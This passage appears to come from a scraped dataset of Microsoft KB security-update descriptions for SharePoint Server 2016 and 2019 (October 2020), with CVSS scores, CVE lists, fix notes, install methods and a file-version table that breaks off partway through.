Pack 2 contains the following feature:\n\n * SharePoint Framework (SPFx)\nThis public update also delivers all the features that were included in Feature Pack 1 for SharePoint Server 2016, including:\n * Administrative Actions Logging\n * MinRole enhancements\n * SharePoint Custom Tiles\n * Hybrid Taxonomy\n * OneDrive API for SharePoint on-premises\n * OneDrive for Business modern user experience (available to Software Assurance customers)\nThe OneDrive for Business modern user experience requires an active Software Assurance contract at the time that the experience is enabled, either by installation of the public update or by manual enablement. If you don't have an active Software Assurance contract at the time of enablement, you must turn off the OneDrive for Business modern user experience.For more information, see the following Microsoft Docs articles:\n * [New features included in the November 2016 Public Update for SharePoint Server 2016 (Feature Pack 1)](<https://go.microsoft.com/fwlink/?linkid=832679>)\n * [New features included in the September 2017 Public Update for SharePoint Server 2016 (Feature Pack 2)](<https://go.microsoft.com/fwlink/?linkid=856819>)\n\n## Improvements and fixes\n\nThis security update contains improvements and fixes for the following nonsecurity issues in SharePoint Server 2016:\n\n * Removes the **Edit Connection Filters** menu item from the User Profile Service synchronization connection list.\n * Fixes the following issue that occurs after the [KB 4484506](<https://support.microsoft.com/help/4484506>) is installed: \n \nAn error occurs when you try to access the \"Result Sources,\" \"Query Rules,\" \"Search Result Sources,\" or \"Search Query Rules\" page from the **Search Settings** section of **Site Settings**.\n * Fixes an exception that occurs when you apply filters in a managed metadata navigation tree.\n * Fixes an issue in which an invalid **SharedWithUsers **property of a file may cause the file upload to fail.\n * Fixes currency scenarios in the English word breaker. Now, users can search currency by number such as \"123.45\" in \"$123.45.\"\n * Fixes an issue in which the upgrade fails when you attach and upgrade an Application Management Service database from SharePoint Server 2016 to SharePoint Server 2019.\n * Fixes an issue in which documents can't be uploaded if the Identity column value reaches maximum limit. \n \n**Note** To fix this issue completely, you have to install [KB 4486681](<https://support.microsoft.com/help/4486681>) together with this update.\n * Fixes an issue in which users can't run a backup if Central Administration is installed on a server that's configured as a Web Front End (WFE) or WFE with Distributed Cache in a MinRole farm.\nThis security update contains fixes for the following issues in Project Server 2016:\n * Opening the approvals page or submitting timesheets is very slow.\n * Sometimes, when you open a project, the **% Complete** value on a Fixed Duration task that's 100 percent complete changes to a lesser value.\n\n## Known issues in this update\n\n**Issue** \nAn error may occur when you upload a file that's larger than 100 MB to a document library.**Resolution** \nTo solve this issue, install [KB 4486753](<https://support.microsoft.com/help/4486753>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4486677>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4486677 for the 64-bit version of SharePoint Enterprise Server 2016](<http://www.microsoft.com/download/details.aspx?familyid=f98f78cd-75fd-49ce-ac13-449badc20798>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 13, 2020](<https://support.microsoft.com/en-us/help/20201013>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484506](<http://support.microsoft.com/kb/4484506>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2016-kb4486677-fullfile-x64-glb.exe| 488AE358249037E9827D4E962999172B5E967A9A| 46141F2D4063A554A10792C7CAA83A305E53505FC77C35C99881CCC9767AB851 \n \nFile informationDownload [the list of files that are included in security update 4486677](<https://download.microsoft.com/download/1/0/f/10fdc5d6-fb48-4f16-a3f6-771486a6bafa/4486677.csv>).\n\n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2016: October 13, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16948", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953"], "modified": "2020-10-13T07:00:00", "id": "KB4486677", "href": "https://support.microsoft.com/en-us/help/4486677", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:20:41", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16941>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16942>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16944>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16945>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16946>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16948>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16950>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16953>)\n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Server 2019 installed on the computer.\n\n## Improvements and fixes\n\nThis security update contains improvements and fixes for the following nonsecurity issues:\n\n * Removes the **Edit Connection Filters** menu item from the User Profile Service synchronization connection list.\n * Fixes the following issue that occurs after the [KB 4484505](<https://support.microsoft.com/help/4484505>) is installed: \n \nAn error occurs when you try to access the \"Result Sources,\" \"Query Rules,\" \"Search Result Sources,\" or \"Search Query Rules\" page from the **Search Settings** section of **Site Settings**.\n * Fixes an issue in which modern pages don't render correctly in non-English sites after [KB 4484505](<https://support.microsoft.com/help/4484505>) is installed.\n * Fixes an issue in which Hit Highlighting causes query suggestion token duplication for German compound words.\n * Fixes an issue in which the upgrade fails when you attach and upgrade an Application Management Service database from SharePoint Server 2016 to SharePoint Server 2019.\n * Fixes an issue in which form columns of Rich Text Editor (RTE) Enhanced and Managed Metadata fields in a classic SharePoint site cause keyboard traps.\n * Fixes an issue in which SharePoint can't resolve users in quick edit mode if their display name contains a comma (,).\n * Fixes an issue in which Azure Active Directory users can't sign in to SharePoint if the [SPTrustedLoginProvider.MetadataEndPoint](<https://docs.microsoft.com/en-us/dotnet/api/microsoft.sharepoint.administration.claims.sptrustedproviderbase.metadataendpoint?view=sharepoint-server#Microsoft_SharePoint_Administration_Claims_SPTrustedProviderBase_MetadataEndPoint>) property is set.\n * Fixes an issue in which republishing content types from content type hub causes floods in the destination site collection recycle bin.\n * When a farm is upgraded, the upgrade session details can be seen in the **_admin/UpgradeStatus.aspx** page in Central Administrator. However, when **job-upgrade-upgradesession-cleanup** is triggered, the latest 14 days of upgrade sessions are deleted. This is now fixed. The timer job **job-upgrade-upgradesession-cleanup** now deletes the upgrade sessions that are only older than 120 days. The number of days until which the upgrade sessions should be retained can also be configured now in the timer job by using a new property **SPUpgradeSessionCleanupJobDefinition.NumberOfDaysToSaveObjects**. For example: \n$upgradeSessionCleanupJob = Get-SPTimerJob -Identity job-upgrade-upgradesession-cleanup $upgradeSessionCleanupJob.NumberOfDaysToSaveObjects = 365 $upgradeSessionCleanupJob.Update()\n * Fixes an issue in whcih the \"select and deselect all items\" column checkbox remains unchanged after you toggle its state on a classic page. \n \n**Note** To fix this issue completely, you have to install [KB 4486675](<https://support.microsoft.com/help/4486675>) together with this update.\n * Fixes an incorrect SQL syntax issue that occurs when you clear taxonomy key filters for a managed metadata column.\n * Fixes an issue in which previewing thumbnail for a video in a videoset fails.\n * Fixes an issue in which an incorrect date is shown for the [UTC+1] time zone if you group by a list view by using a lookup column.\n * Fixes an issue in which [Import-SPWeb](<https://docs.microsoft.com/powershell/module/sharepoint-server/import-spweb?view=sharepoint-ps>) throws exceptions after you change the column width of a list and export the list by using [Export-SPWeb](<https://docs.microsoft.com/powershell/module/sharepoint-server/export-spweb?view=sharepoint-ps>).\n * Fixes an issue in which users are prompted for credentials when they access a subsite without permission to the root site.\nThis security update contains fixes for the following nonsecurity issues in Project Server 2019:\n * Sometimes, when you open a project, the **% Complete** value on a Fixed Duration task that's 100 percent complete changes to a lesser value.\n * On a portfolio cost analysis, the picker control that enables you to choose \"Forced-in,\" \"Forced-out,\" or \"Auto\" is unavailable. Therefore, you can't change projects that you want to force in or out of the analysis. This occurs on Project Web App instances that have been defined as host-named site collections.\n\n## Known issues in this update\n\n**Issue** \nAn error may occur when you upload a file that's larger than 100 MB to a classic document library. \n \n**Resolution** \nTo solve this issue, install [KB 4486751](<https://support.microsoft.com/help/4486751>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4486676>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4486676 for the 64-bit version of SharePoint Server 2019](<http://www.microsoft.com/download/details.aspx?familyid=b817b1ed-fe26-40ac-96eb-730461032274>)\n\n## More iformation\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 13, 2020](<https://support.microsoft.com/en-us/help/20201013>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484505](<http://support.microsoft.com/kb/4484505>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2019-kb4486676-fullfile-x64-glb.exe| A15F41C3789468FD4984D102C245108D14462C01| B43805AA07378359E3724263B37EC2368D0B4FC39DCE2077FFC96F72F3431840 \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Server 2019\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmicrosoft.office.access.services.moss.dll| microsoft.office.access.services.moss.dll| 16.0.10367.20000| 767912| 15-Sep-20| 12:02 \nascalc.dll| ascalc.dll| 16.0.10367.20000| 972208| 15-Sep-20| 12:02 \nmicrosoft.office.access.server.application.dll| microsoft.office.access.server.application.dll| 16.0.10367.20000| 608176| 15-Sep-20| 12:02 \nmicrosoft.office.access.server.dll| microsoft.office.access.server.dll| 16.0.10367.20000| 1410480| 15-Sep-20| 12:02 \naccsrv.layouts.root.accsrvscripts.js| accessserverscripts.js| | 575532| 15-Sep-20| 12:03 \nconversion.chartserver.dll| chartserver.dll| 16.0.10367.20000| 16148392| 15-Sep-20| 11:57 \nppt.conversion.chartserver.dll| chartserver.dll| 16.0.10367.20000| 16148392| 15-Sep-20| 11:57 \nppt.edit.chartserver.dll| chartserver.dll| 16.0.10367.20000| 16148392| 15-Sep-20| 11:57 \nwac.office.chartserver.dll| chartserver.dll| 16.0.10367.20000| 16148392| 15-Sep-20| 11:57 \nprodfeat.xml| feature.xml| | 616| 15-Sep-20| 11:55 \nastcmmn_js| assetcommon.js| | 18253| 15-Sep-20| 12:00 \nastpkrs_js| assetpickers.js| | 68292| 15-Sep-20| 12:01 \nsm.js| cmssitemanager.js| | 29279| 15-Sep-20| 12:01 \ncmssummarylinks_js| cmssummarylinks.js| | 6015| 15-Sep-20| 12:00 \neditmenu_js| editingmenu.js| | 11359| 15-Sep-20| 12:01 \nhierlist_js| hierarchicallistbox.js| | 30327| 15-Sep-20| 12:00 \nmediaplayer.js| mediaplayer.js| | 47725| 15-Sep-20| 12:00 \nptdlg.js| pickertreedialog.js| | 2950| 15-Sep-20| 12:01 \nselect_js| select.js| | 2387| 15-Sep-20| 12:00 \nslctctls_js| selectorcontrols.js| | 13288| 15-Sep-20| 12:00 \nserializ_js| serialize.js| | 3219| 15-Sep-20| 12:00 \nsp.ui.assetlibrary.ribbon.debug.js| sp.ui.assetlibrary.debug.js| | 13220| 15-Sep-20| 12:01 \nsp.ui.assetlibrary.js| sp.ui.assetlibrary.js| | 5367| 15-Sep-20| 12:01 \nsp.ui.pub.htmldesign.debug.js| sp.ui.pub.htmldesign.debug.js| | 38342| 15-Sep-20| 12:00 \nsp.ui.pub.htmldesign.js| sp.ui.pub.htmldesign.js| | 19407| 15-Sep-20| 12:00 \nsp.ui.pub.ribbon.debug.js| sp.ui.pub.ribbon.debug.js| | 146313| 15-Sep-20| 12:00 \nsp.ui.pub.ribbon.js| sp.ui.pub.ribbon.js| | 84979| 15-Sep-20| 12:00 \nsp.ui.rte.publishing.debug.js| sp.ui.rte.publishing.debug.js| | 98216| 15-Sep-20| 12:01 \nsp.ui.rte.publishing.js| sp.ui.rte.publishing.js| | 49716| 15-Sep-20| 12:01 \nsp.ui.spellcheck.debug.js| sp.ui.spellcheck.debug.js| | 68393| 15-Sep-20| 12:01 \nsp.ui.spellcheck.js| sp.ui.spellcheck.js| | 36522| 15-Sep-20| 12:01 \nsplchkpg_js| spellcheckentirepage.js| | 6653| 15-Sep-20| 12:00 \nspelchek_js| spellchecker.js| | 34657| 15-Sep-20| 12:01 \nvideoportal.js| videoportal.js| | 14742| 15-Sep-20| 12:00 \nmicrosoft.sharepoint.publishing.dll_isapi| microsoft.sharepoint.publishing.dll| 16.0.10367.20000| 5409208| 15-Sep-20| 11:56 \nsharepointpub.dll| microsoft.sharepoint.publishing.dll| 16.0.10367.20000| 5409208| 15-Sep-20| 11:56 \nsharepointpub_gac.dll| microsoft.sharepoint.publishing.dll| 16.0.10367.20000| 5409208| 15-Sep-20| 11:56 \nsppubint.dll| microsoft.sharepoint.publishing.intl.dll| 16.0.10367.20000| 350640| 15-Sep-20| 11:57 \nsppubint_gac.dll| microsoft.sharepoint.publishing.intl.dll| 16.0.10367.20000| 350640| 15-Sep-20| 11:57 \nschema.xml_pubresfeap| schema.xml| | 44173| 15-Sep-20| 11:55 \nasctyps.xml| assetcontenttypes.xml| | 2846| 15-Sep-20| 12:00 \nasctyps2.xml| assetcontenttypes2.xml| | 2460| 15-Sep-20| 12:00 \nasflds.xml| assetfields.xml| | 1366| 15-Sep-20| 12:00 \nasflds2.xml| assetfields2.xml| | 1045| 15-Sep-20| 12:01 \naslibalt.xml| assetlibrarytemplate.xml| | 555| 15-Sep-20| 12:00 \naslibft.xml| feature.xml| | 2763| 15-Sep-20| 12:00 \naslibui.xml| provisionedui.xml| | 5075| 15-Sep-20| 12:01 \naslibui2.xml| provisionedui2.xml| | 1708| 15-Sep-20| 12:00 \ncdsele.xml| contentdeploymentsource.xml| | 637| 15-Sep-20| 11:56 \ncdsfeatu.xml| feature.xml| | 604| 15-Sep-20| 11:55 \ndocmpgcv.xml| docmpageconverter.xml| | 496| 15-Sep-20| 12:03 \ndocxpgcv.xml| docxpageconverter.xml| | 496| 15-Sep-20| 12:03 \nconvfeat.xml| feature.xml| | 766| 15-Sep-20| 12:03 \nippagecv.xml| infopathpageconverter.xml| | 577| 15-Sep-20| 12:03 \nxslappcv.xml| xslapplicatorconverter.xml| | 575| 15-Sep-20| 12:03 \nanalyticsreports.xml| analyticsreports.xml| | 2850| 15-Sep-20| 11:57 \nxspsset.xml| catalogsitesettings.xml| | 556| 15-Sep-20| 11:57 \nxspfeat.xml| feature.xml| | 1514| 15-Sep-20| 11:57 \ndepoper.xml| deploymentoperations.xml| | 2415| 15-Sep-20| 11:55 \ndepfeat.xml| feature.xml| | 788| 15-Sep-20| 11:56 \npestset.xml| enhancedhtmlediting.xml| | 157| 15-Sep-20| 12:03 \npefeat.xml| feature.xml| | 793| 15-Sep-20| 12:03 \nenthmft.xml| feature.xml| | 564| 15-Sep-20| 11:56 \nenthmset.xml| themingsitesettings.xml| | 1005| 15-Sep-20| 11:55 \nenctb.xml| enterprisewikicontenttypebinding.xml| | 559| 15-Sep-20| 11:55 \nenctb2.xml| enterprisewikicontenttypebinding2.xml| | 390| 15-Sep-20| 11:55 \nenfet.xml| feature.xml| | 1168| 15-Sep-20| 11:56 \nenct.xml| enterprisewikicontenttypes.xml| | 1456| 15-Sep-20| 12:03 \nenct2.xml| enterprisewikicontenttypes2.xml| | 1211| 15-Sep-20| 12:03 \nenlayfet.xml| feature.xml| | 1618| 15-Sep-20| 12:03 \nprov.xml| provisionedfiles.xml| | 1181| 15-Sep-20| 12:03 \nprov2.xml| provisionedfiles2.xml| | 1197| 15-Sep-20| 12:03 \newiki2.xml| feature.xml| | 766| 15-Sep-20| 11:57 \nhtmlfeat.xml| feature.xml| | 11263| 15-Sep-20| 12:01 \nhtmlcolm.xml| htmldesigncolumns.xml| | 909| 15-Sep-20| 12:01 \nhtmlcol2.xml| htmldesigncolumns2.xml| | 543| 15-Sep-20| 12:01 \nhtmlcol3.xml| htmldesigncolumns3.xml| | 597| 15-Sep-20| 12:00 \nhtmlcont.xml| htmldesigncontenttypes.xml| | 2330| 15-Sep-20| 12:00 \nhtmlfile.xml| htmldesignfiles.xml| | 657| 15-Sep-20| 12:01 \nhtmlfil2.xml| htmldesignfiles2.xml| | 771| 15-Sep-20| 12:00 \nhtmlfil3.xml| htmldesignfiles3.xml| | 895| 15-Sep-20| 12:00 \nhtmldpui.xml| htmldesignprovisionedui.xml| | 669| 15-Sep-20| 12:00 \nhtmldrib.xml| htmldesignribbon.xml| | 29320| 15-Sep-20| 12:00 \nhtmldpct.xml| htmldisplaytemplatecontenttypes.xml| | 11361| 15-Sep-20| 12:01 \nhtmldpwp.xml| htmldisplaytemplatefiles.xml| | 9302| 15-Sep-20| 12:01 \nhtmldpwp10.xml| htmldisplaytemplatefiles10.xml| | 575| 15-Sep-20| 12:01 \nhtmldpwp11.xml| htmldisplaytemplatefiles11.xml| | 1091| 15-Sep-20| 12:01 \nhtmldpwp12.xml| htmldisplaytemplatefiles12.xml| | 401| 15-Sep-20| 12:00 \nhtmldpwp13.xml| htmldisplaytemplatefiles13.xml| | 396| 15-Sep-20| 12:00 \nhtmldpwp14.xml| htmldisplaytemplatefiles14.xml| | 856| 15-Sep-20| 12:00 \nhtmldpwp15.xml| htmldisplaytemplatefiles15.xml| | 492| 15-Sep-20| 12:01 \nhtmldpwp2.xml| htmldisplaytemplatefiles2.xml| | 830| 15-Sep-20| 12:00 \nhtmldpwp3.xml| htmldisplaytemplatefiles3.xml| | 497| 15-Sep-20| 12:00 \nhtmldpwp4.xml| htmldisplaytemplatefiles4.xml| | 496| 15-Sep-20| 12:00 \nhtmldpwp5.xml| htmldisplaytemplatefiles5.xml| | 506| 15-Sep-20| 12:01 \nhtmldpwp6.xml| htmldisplaytemplatefiles6.xml| | 412| 15-Sep-20| 12:00 \nhtmldpwp7.xml| htmldisplaytemplatefiles7.xml| | 4003| 15-Sep-20| 12:01 \nhtmldpwp8.xml| htmldisplaytemplatefiles8.xml| | 399| 15-Sep-20| 12:01 \nhtmldpwp9.xml| htmldisplaytemplatefiles9.xml| | 401| 15-Sep-20| 12:00 \nhtmldtcbs.xml| htmldisplaytemplatefilesoobcbs.xml| | 580| 15-Sep-20| 12:01 \nhtmldtqb.xml| htmldisplaytemplatefilesqb.xml| | 598| 15-Sep-20| 12:00 \nhtmldtqbref.xml| htmldisplaytemplatefilesqbref.xml| | 507| 15-Sep-20| 12:00 \nhtmldpwp_recs.xml| htmldisplaytemplatefilesrecs.xml| | 418| 15-Sep-20| 12:01 \nststngimplk.xml| sitesettingsimportlink.xml| | 667| 15-Sep-20| 12:00 \naltmp.xam| alternatemediaplayer.xaml| | 35634| 15-Sep-20| 12:01 \nmwpfeat.xml| feature.xml| | 940| 15-Sep-20| 12:01 \nmwpprovf.xml| provisionedfiles.xml| | 1457| 15-Sep-20| 12:01 \nmwpprovu.xml| provisionedui.xml| | 22914| 15-Sep-20| 12:01 \nmwpprovui2.xml| provisionedui2.xml| | 2690| 15-Sep-20| 12:01 \npnfeat.xml| feature.xml| | 782| 15-Sep-20| 11:58 \npnstset.xml| navigationsitesettings.xml| | 4721| 15-Sep-20| 11:58 \nplnfeat.xml| feature.xml| | 760| 15-Sep-20| 11:55 \nplnstset.xml| navigationsitesettings.xml| | 152| 15-Sep-20| 11:56 \ntpfeat.xml| feature.xml| | 2846| 15-Sep-20| 12:03 \ntpcls.xml| pointpublishingcolumns.xml| | 701| 15-Sep-20| 12:03 \ntpcts.xml| pointpublishingcontenttypes.xml| | 488| 15-Sep-20| 12:03 \ntptltsch.xml| schema.xml| | 4088| 15-Sep-20| 11:55 \npclts.xml| schema.xml| | 2354| 15-Sep-20| 12:02 \npcltf.xml| feature.xml| | 857| 15-Sep-20| 12:02 \npclt.xml| productcataloglisttemplate.xml| | 753| 15-Sep-20| 12:02 \npcfeat.xml| feature.xml| | 1699| 15-Sep-20| 12:01 \npccol.xml| productcatalogcolumns.xml| | 6259| 15-Sep-20| 12:00 \npcct.xml| productcatalogcontenttypes.xml| | 830| 15-Sep-20| 12:01 \npcct2.xml| productcatalogcontenttypes2.xml| | 643| 15-Sep-20| 12:01 \npcprov.xml| provisionedfiles.xml| | 926| 15-Sep-20| 12:00 \npubpubpf.xml| feature.xml| | 551| 15-Sep-20| 12:03 \npppptset.xml| portalsettings.xml| | 584| 15-Sep-20| 12:03 \nctconvst.xml| contenttypeconvertersettings.xml| | 511| 15-Sep-20| 11:58 \ndoclbset.xml| documentlibrarysettings.xml| | 524| 15-Sep-20| 11:58 \neditmenu.xml| editingmenu.xml| | 470| 15-Sep-20| 11:58 \npubfeat.xml| feature.xml| | 2696| 15-Sep-20| 11:58 \npaglttmp.xml| pageslisttemplate.xml| | 516| 15-Sep-20| 11:58 \nprovui.xml| provisionedui.xml| | 40574| 15-Sep-20| 11:58 \nprovui2.xml| provisionedui2.xml| | 1489| 15-Sep-20| 11:58 \nprovui3.xml| provisionedui3.xml| | 2135| 15-Sep-20| 11:58 \npubstset.xml| publishingsitesettings.xml| | 6235| 15-Sep-20| 11:58 \nregext.xml| regionalsettingsextensions.xml| | 328| 15-Sep-20| 11:58 \nsiteacmn.xml| siteactionmenucustomization.xml| | 646| 15-Sep-20| 11:59 \nvarflagc.xml| variationsflagcontrol.xml| | 473| 15-Sep-20| 11:58 \nvarnomin.xml| variationsnomination.xml| | 613| 15-Sep-20| 11:58 \npblyfeat.xml| feature.xml| | 6194| 15-Sep-20| 12:01 \npblyprovfile.xml| provisionedfiles.xml| | 7964| 15-Sep-20| 12:01 \npblyprovfile2.xml| provisionedfiles2.xml| | 610| 15-Sep-20| 12:01 \npblyprovfile4.xml| provisionedfiles4.xml| | 308| 15-Sep-20| 12:02 \npblyprovfile5.xml| provisionedfiles5.xml| | 414| 15-Sep-20| 12:02 \npblyprovfile6.xml| provisionedfiles6.xml| | 385| 15-Sep-20| 12:02 \npblyprovfile7.xml| provisionedfiles7.xml| | 1170| 15-Sep-20| 12:01 \npblyprovfile8.xml| provisionedfiles8.xml| | 507| 15-Sep-20| 12:01 \npblyprovui.xml| provisionedui.xml| | 11330| 15-Sep-20| 12:01 \nxspfeatlayouts.xml| searchboundpagelayouts.xml| | 3671| 15-Sep-20| 12:02 \npubmelem.xml| elements.xml| | 4149| 15-Sep-20| 11:56 \npubmele2.xml| elements2.xml| | 592| 15-Sep-20| 11:55 \npubmfeat.xml| feature.xml| | 1697| 15-Sep-20| 11:55 \npubmprui.xml| provisionedui.xml| | 1548| 15-Sep-20| 11:55 \npubmstng.xml| sitesettings.xml| | 670| 15-Sep-20| 11:56 \npubprft.xml| feature.xml| | 758| 15-Sep-20| 12:01 \npubrfeat.xml| feature.xml| | 4927| 15-Sep-20| 11:59 \nprovfile.xml| provisionedfiles.xml| | 4739| 15-Sep-20| 11:59 \nprovfl4.xml| provisionedfiles4.xml| | 1394| 15-Sep-20| 11:59 \npubrcol.xml| publishingcolumns.xml| | 20566| 15-Sep-20| 11:59 \npubrctt.xml| publishingcontenttypes.xml| | 12093| 15-Sep-20| 11:59 \npubrctt2.xml| publishingcontenttypes2.xml| | 304| 15-Sep-20| 11:59 \npubrctt3.xml| publishingcontenttypes3.xml| | 500| 15-Sep-20| 11:59 \npubrcont.xml| publishingcontrols.xml| | 405| 15-Sep-20| 11:59 \nprsset.xml| publishingresourcessitesettings.xml| | 3506| 15-Sep-20| 11:59 \nupgd1.xml| upgrade1.xml| | 548| 15-Sep-20| 11:59 \nupgd2.xml| upgrade2.xml| | 486| 15-Sep-20| 11:59 \nupgd3.xml| upgrade3.xml| | 600| 15-Sep-20| 11:59 \npubtfeat.xml| feature.xml| | 1477| 15-Sep-20| 12:03 \nrollplf.xml| feature.xml| | 862| 15-Sep-20| 11:55 \nrollplpf.xml| provisionedfiles.xml| | 14529| 15-Sep-20| 11:56 \nrollplct.xml| rolluppagecontenttype.xml| | 742| 15-Sep-20| 11:55 \nrollpf.xml| feature.xml| | 816| 15-Sep-20| 12:00 \nrollps.xml| rolluppagesettings.xml| | 4091| 15-Sep-20| 12:01 \nseofeatu.xml| feature.xml| | 1253| 15-Sep-20| 11:59 \nseoopt.xml| searchengineoptimization.xml| | 3578| 15-Sep-20| 11:59 \nseoopt1.xml| searchengineoptimization1.xml| | 2904| 15-Sep-20| 11:59 \nsppelm.xml| elements.xml| | 1843| 15-Sep-20| 12:00 \nsppfea.xml| feature.xml| | 1015| 15-Sep-20| 12:01 \nsaicona.xml| consoleaction.xml| | 412| 15-Sep-20| 12:00 \nsaifeat.xml| feature.xml| | 1324| 15-Sep-20| 12:00 \nsairibn.xml| ribbon.xml| | 2895| 15-Sep-20| 12:00 \nsaisset.xml| sitesettings.xml| | 584| 15-Sep-20| 12:01 \naddtheme.xml| additionalthemes.xml| | 3819| 15-Sep-20| 11:56 \nsbwcopa.xml| colorpalette.xml| | 4813| 15-Sep-20| 11:55 \nsbwcona.xml| consoleaction.xml| | 692| 15-Sep-20| 11:55 \nsbwct.xml| contenttypes.xml| | 4261| 15-Sep-20| 11:55 \nsbwdesba.xml| designbuilderaction.xml| | 444| 15-Sep-20| 11:56 \nsbwdesea.xml| designeditoraction.xml| | 438| 15-Sep-20| 11:56 \nsbwdpa.xml| designpackageactions.xml| | 418| 15-Sep-20| 11:55 \nsbwdpr.xml| designpreviewaction.xml| | 447| 15-Sep-20| 11:56 \nsbwdmt.xml| disablesystemmasterpagetheming.xml| | 436| 15-Sep-20| 11:55 \nsbwfeat.xml| feature.xml| | 6499| 15-Sep-20| 11:55 \nsbwinsdes.xml| installeddesigns.xml| | 536| 15-Sep-20| 11:56 \nsbwmob.xml| mobilechannel.xml| | 1098| 15-Sep-20| 11:55 \nsbwpagela.xml| pagelayouts.xml| | 4119| 15-Sep-20| 11:55 \nsbwpages.xml| pages.xml| | 13120| 15-Sep-20| 11:56 \npubblogwp.xml| publishingblogwebparts.xml| | 949| 15-Sep-20| 11:56 \nsbwqd.xml| quicklaunchdatasource.xml| | 685| 15-Sep-20| 11:55 \nsbwrb.xml| ribbon.xml| | 44107| 15-Sep-20| 11:55 \nsbwsearch.xml| search.xml| | 2352| 15-Sep-20| 11:55 \nsbwsc.xml| sitecolumns.xml| | 3579| 15-Sep-20| 11:55 \nsbwsec.xml| siteelementcontrols.xml| | 952| 15-Sep-20| 11:56 \nsbwss.xml| sitesettings.xml| | 14657| 15-Sep-20| 11:55 \nsbwcss.xml| styles.xml| | 625| 15-Sep-20| 11:56 \nsbwwps.xml| webparts.xml| | 509| 15-Sep-20| 11:56 \nsbwfsf.xml| feature.xml| | 708| 